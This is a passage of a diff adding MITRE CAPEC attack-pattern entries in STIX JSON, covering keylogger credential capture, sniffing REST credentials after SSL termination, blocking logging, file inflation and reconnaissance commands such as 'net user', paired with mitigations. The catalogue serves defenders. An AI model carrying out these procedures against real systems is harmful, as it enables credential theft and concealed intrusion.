"2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39894d0f-45fc-4d1e-ac83-029554eb758f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-566", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/566.html" + } + ], + "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Dump Password Hashes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-567", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/567.html" + } + ], + "id": "attack-pattern--e8f4c3d0-0aaf-4a96-b31c-9e6e8b5e15da", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Obtain Data via Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

    2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger

  2. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  3. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

    4. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security can help reduce the ability of an adversary to install a keylogger.", + "id": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-568-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76f04316-3bcf-4941-8aa8-df14017ac277", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "spec_version": "2.1", + "target_ref": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.", + "external_references": [ + { + "external_id": "CAPEC-569", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/569.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + } + ], + "id": "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Collect Data as Provided by Users", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.", + "external_references": [ + { + "external_id": "CAPEC-57", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/57.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Utilizing REST's Trust in the System Resource to Obtain Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the adversary can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a REST-style application that uses SSL: The adversary must first find a REST-style application that uses SSL to target. Because this attack is easier to carry out from inside of a server network, it is likely that an adversary could have inside knowledge of how services operate.

Experiment

  1. Insert a listener to sniff client-server communication: The adversary inserts a listener that must exist beyond the point where SSL is terminated. This can be placed on the client side if it is believed that sensitive information is being sent to the client as a response, although most often the listener will be placed on the server side to listen for client authentication information.

    2. Techniques
    Run wireshark or tcpdump on a device that is on the inside of a firewall, load balancer, or router of a network and capture traffic after SSL has been terminated

Exploit

  1. Gather information passed in the clear: If developers have not hashed or encrypted data sent in the sniffed request, the adversary will be able to read this data in the clear. Most commonly, they will now have a username or password that they can use to submit requests to the web service just as an authorized user

", + "x_capec_extended_description": "\n Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required.\n Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The adversary can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the adversary gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Opportunity to intercept must exist beyond the point where SSL is terminated.", + "The adversary must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path." + ], + "x_capec_skills_required": { + "Low": "To insert a network sniffer or other listener into the communication stream" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement message level security such as HMAC in the HTTP communication", + "id": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6d23a13-264b-4642-b6ca-c39f175c9d9e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "spec_version": "2.1", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize defense in depth, do not rely on a single security mechanism like SSL", + "id": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d893b6fe-7c69-4a0a-a687-450db912f094", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8ca2309-7035-4c1b-91a7-0c39f533a82b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-570", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/570.html" + } + ], + "id": "attack-pattern--80f16e35-c7c1-445d-8f12-a77bbbce6bcf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Signature-Based Avoidance", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary prevents host-generated logs being delivered to a central location in an attempt to hide indicators of compromise.\n ", + "external_references": [ + { + "external_id": "CAPEC-571", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/571.html" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Impair Command History Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Indicator Blocking", + "external_id": "T1562.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/006" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + } + ], + "id": "attack-pattern--8f91fa23-b5c4-48f1-be6c-99582524f8cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Block Logging to Central Repository", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In the case of network based reporting of indicators, an adversary may block traffic associated with reporting to prevent central station analysis. This may be accomplished by many means such as stopping a local process to creating a host-based firewall rule to block traffic to a specific server.\n In the case of local based reporting of indicators, an adversary may block delivery of locally-generated log files themselves to the central repository.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary modifies file contents by adding data to files for several reasons. Many different attacks could “follow” this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity.\n ", + "external_references": [ + { + "external_id": "CAPEC-572", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/572.html" + }, + { + "description": "Obfuscated Files or Information:Binary Padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Artificially Inflate File Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.", + "external_references": [ + { + "external_id": "CAPEC-573", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/573.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Process Discovery", + "external_id": "T1057", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1057" + } + ], + "id": "attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Process Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "On a Windows system, the command, \"tasklist,\" displays information about processes. The same function on a Mac OS system is done with the command, \"ps.\"", + "In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d90ebca8-a2a7-44f1-afb0-5bf198b230a1", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df51abec-081d-46dd-8f72-6ffd3d11d3dc", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. Depending on the operating system, commands that can obtain services information include \"sc\" and \"tasklist/svc\" using Tasklist, and \"net start\" using Net.", + "external_references": [ + { + "external_id": "CAPEC-574", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/574.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Service Discovery", + "external_id": "T1007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1007" + } + ], + "id": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Services Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by uaing a process allowlist.", + "id": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-574-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae71c8b1-867e-4d0f-b856-1f1dc4334311", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "spec_version": "2.1", + "target_ref": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. Example Windows commands which can acquire this information are: \"net user\" and \"dsquery\".", + "external_references": [ + { + "external_id": "CAPEC-575", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/575.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Account Discovery", + "external_id": "T1087", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1087" + } + ], + "id": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Account Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by uysing a process allowlist.", + "id": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-575-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a83980a6-7bad-41f4-967c-54f888a25a11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "spec_version": "2.1", + "target_ref": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command which can list local groups is \"net localgroup\".", + "external_references": [ + { + "external_id": "CAPEC-576", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/576.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Permission Groups Discovery", + "external_id": "T1069", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1069" + }, + { + "description": "Group Policy Discovery", + "external_id": "T1615", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1615" + } + ], + "id": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Group Permission Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs (such as \"net\") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-576-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66551e96-dd41-445e-855d-1b22ca5c0267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ 